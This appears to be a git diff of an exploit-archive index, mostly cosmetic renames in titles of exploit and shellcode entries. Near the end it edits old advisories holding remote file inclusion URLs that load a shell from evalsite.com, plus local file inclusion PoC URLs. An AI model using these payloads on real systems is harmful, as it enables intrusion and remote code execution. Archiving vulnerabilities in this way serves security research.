Execution Exploit",2016-06-29,Cr4sh,windows,local,0 40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445 -40042,platforms/php/webapps/40042.php,"WordPress Ultimate Membership Pro Plugin 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80 +40042,platforms/php/webapps/40042.php,"Wordpress Ultimate Membership Pro Plugin 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Cross-Site Request Forgery to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443 40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80 @@ -36240,8 +36240,8 @@ id,file,description,date,author,platform,type,port 40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution Cross-Site Request Forgery",2016-07-04,LiquidWorm,jsp,webapps,30303 40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - NetCat Bind Shell Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 -40055,platforms/php/webapps/40055.py,"WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80 -40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell Port 4444/TCP shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 +40055,platforms/php/webapps/40055.py,"Wordpress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80 +40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80 40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80 40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80 @@ -36254,7 +36254,7 @@ id,file,description,date,author,platform,type,port 40067,platforms/linux/remote/40067.rb,"Nagios XI Chained - Remote Code Execution",2016-07-06,Metasploit,linux,remote,80 40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80 40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0 -40070,platforms/php/webapps/40070.txt,"WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) Cross-Site Request Forgery",2016-07-08,"Persian Hack Team",php,webapps,80 +40070,platforms/php/webapps/40070.txt,"Wordpress Lazy Content Slider Plugin 3.4 - (Add Catetory) Cross-Site Request Forgery",2016-07-08,"Persian Hack Team",php,webapps,80 40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0 40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0 40073,platforms/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0 @@ -36263,12 +36263,12 @@ id,file,description,date,author,platform,type,port 40076,platforms/php/webapps/40076.php,"php Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80 40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80 -40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 +40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0 -40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2008-2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0 +40107,platforms/windows/local/40107.rb,"Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0 40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 -40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 +40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 40183,platforms/multiple/dos/40183.html,"WebKit - TypedArray.fill Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 @@ -36296,7 +36296,7 @@ id,file,description,date,author,platform,type,port 40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Add Advanced Admin Cross-Site Request Forgery",2016-07-20,LiquidWorm,multiple,webapps,8088 40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting",2016-07-20,LiquidWorm,multiple,webapps,8088 40136,platforms/linux/remote/40136.py,"OpenSSHD 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 -40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80 +40137,platforms/php/webapps/40137.html,"Wordpress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - WRQ Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80 @@ -36324,7 +36324,7 @@ id,file,description,date,author,platform,type,port 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23 -40169,platforms/linux/local/40169.txt,"VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0 +40169,platforms/linux/local/40169.txt,"VMware - Setuid VMware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - (.pls) Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 @@ -36337,9 +36337,9 @@ id,file,description,date,author,platform,type,port 40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 40184,platforms/multiple/dos/40184.html,"WebKit - TypedArray.copyWithin Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0 40185,platforms/php/webapps/40185.py,"PhpMyAdmin 4.6.2 - Post-Authenticated Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 -40189,platforms/php/webapps/40189.txt,"WordPress Booking Calendar Plugin 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80 -40190,platforms/php/webapps/40190.txt,"WordPress WP Live Chat Support Plugin 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80 -40191,platforms/php/webapps/40191.txt,"WordPress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) Cross-Site Request Forgery",2016-08-01,"Yorick Koster",php,webapps,80 +40189,platforms/php/webapps/40189.txt,"Wordpress Booking Calendar Plugin 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80 +40190,platforms/php/webapps/40190.txt,"Wordpress WP Live Chat Support Plugin 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80 +40191,platforms/php/webapps/40191.txt,"Wordpress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) Cross-Site Request Forgery",2016-08-01,"Yorick Koster",php,webapps,80 40192,platforms/windows/dos/40192.py,"Halliburton LogView Pro 9.7.5 - (.cgm/.tif/.tiff/.tifh) Crash PoC",2016-08-01,"Karn Ganeshen",windows,dos,0 40194,platforms/multiple/dos/40194.txt,"Wireshark 1.12.0-1.12.12 - NDS Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 40195,platforms/multiple/dos/40195.txt,"Wireshark 2.0.0 < 2.0.4 - MMSE / WAP / WBXML / WSP Dissectors Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0 @@ -36353,7 +36353,7 @@ id,file,description,date,author,platform,type,port 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0 40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80 40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80 -40206,platforms/php/webapps/40206.txt,"WordPress Count per Day Plugin 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80 +40206,platforms/php/webapps/40206.txt,"Wordpress Count per Day Plugin 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80 40207,platforms/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",hardware,webapps,80 40208,platforms/windows/dos/40208.py,"Kodi Web Server 16.1 - Denial of Service",2016-08-05,"Guillaume Kaddouch",windows,dos,8080 40209,platforms/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Root Exploit",2016-08-06,LiquidWorm,php,webapps,80 @@ -36366,7 +36366,7 @@ id,file,description,date,author,platform,type,port 40216,platforms/jsp/webapps/40216.txt,"Navis WebAccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 40218,platforms/php/webapps/40218.txt,"phpCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80 40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0 -40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - (File Upload) Cross-Site Request Forgery",2016-08-08,"Edwin Molenaar",php,webapps,80 +40220,platforms/php/webapps/40220.txt,"Wordpress Add From Server Plugin < 3.3.2 - (File Upload) Cross-Site Request Forgery",2016-08-08,"Edwin Molenaar",php,webapps,80 40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 @@ -36431,15 +36431,15 @@ id,file,description,date,author,platform,type,port 40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 40284,platforms/hardware/webapps/40284.txt,"VideoIQ Camera - Local File Disclosure",2016-08-22,"Yakir Wizman",hardware,webapps,0 40286,platforms/java/webapps/40286.txt,"Sakai 10.7 - Multiple Vulnerabilities",2016-08-22,LiquidWorm,java,webapps,0 -40288,platforms/php/webapps/40288.txt,"WordPress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",php,webapps,80 +40288,platforms/php/webapps/40288.txt,"Wordpress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",php,webapps,80 40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0 -40290,platforms/php/webapps/40290.txt,"WordPress Mail Masta Plugin 1.0 - Local File Inclusion",2016-08-23,"Guillermo Garcia Marcos",php,webapps,80 +40290,platforms/php/webapps/40290.txt,"Wordpress Mail Masta Plugin 1.0 - Local File Inclusion",2016-08-23,"Guillermo Garcia Marcos",php,webapps,80 40291,platforms/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",linux,dos,0 40292,platforms/php/webapps/40292.txt,"SimplePHPQuiz - Blind SQL Injection",2016-08-23,HaHwul,php,webapps,80 40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80 40309,platforms/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos,0 -40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80 +40295,platforms/php/webapps/40295.txt,"Wordpress CYSTEME Finder Plugin 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80 40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0 40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0 40313,platforms/php/dos/40313.php,"PHP 5.0.0 - imap_mail() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0 diff --git a/platforms/php/webapps/2173.txt b/platforms/php/webapps/2173.txt index d9ebfa719..2cb1a56f7 100755 --- a/platforms/php/webapps/2173.txt +++ b/platforms/php/webapps/2173.txt @@ -13,8 +13,8 @@ BaseLoader.php BaseView.php ExP: -http://www.sito.com/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php -http://www.sito.com/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php -http://www.sito.com/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php +http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php +http://server/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php +http://server/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php # milw0rm.com [2006-08-10] diff --git a/platforms/php/webapps/37563.html b/platforms/php/webapps/37563.html index 60d603dda..0b5248d15 100755 --- a/platforms/php/webapps/37563.html +++ b/platforms/php/webapps/37563.html @@ -7,7 +7,7 @@ Exploiting this issue could allow an attacker to compromise the application, acc G-Lock Double Opt-in Manager 2.6.2 and prior versions are vulnerable. -
+ diff --git a/platforms/php/webapps/4538.txt b/platforms/php/webapps/4538.txt index feb934cca..c3189846e 100755 --- a/platforms/php/webapps/4538.txt +++ b/platforms/php/webapps/4538.txt @@ -15,8 +15,8 @@ artmedic-cms.de PoC: -http://www.sito.com/cms/index.php?page=[LFI] -http://www.sito.com/index.php?page=[LFI] +http://server/cms/index.php?page=[LFI] +http://server/index.php?page=[LFI] d0rK: CMS von artmedic webdesign